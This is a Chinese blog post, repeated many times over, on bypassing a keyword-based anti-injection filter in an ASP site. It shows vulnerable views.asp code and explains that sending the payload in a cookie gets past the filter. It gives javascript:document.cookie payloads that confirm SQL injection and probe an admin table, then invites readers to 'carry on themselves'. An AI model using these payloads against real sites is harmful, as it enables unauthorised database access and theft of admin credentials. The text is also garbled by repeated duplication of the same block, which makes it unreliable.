  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43102) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43101) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43100) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43099) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43098) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43097) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43096) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43095) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43094) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43093) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43092) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43091) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43090) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43089) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43088) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43087) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
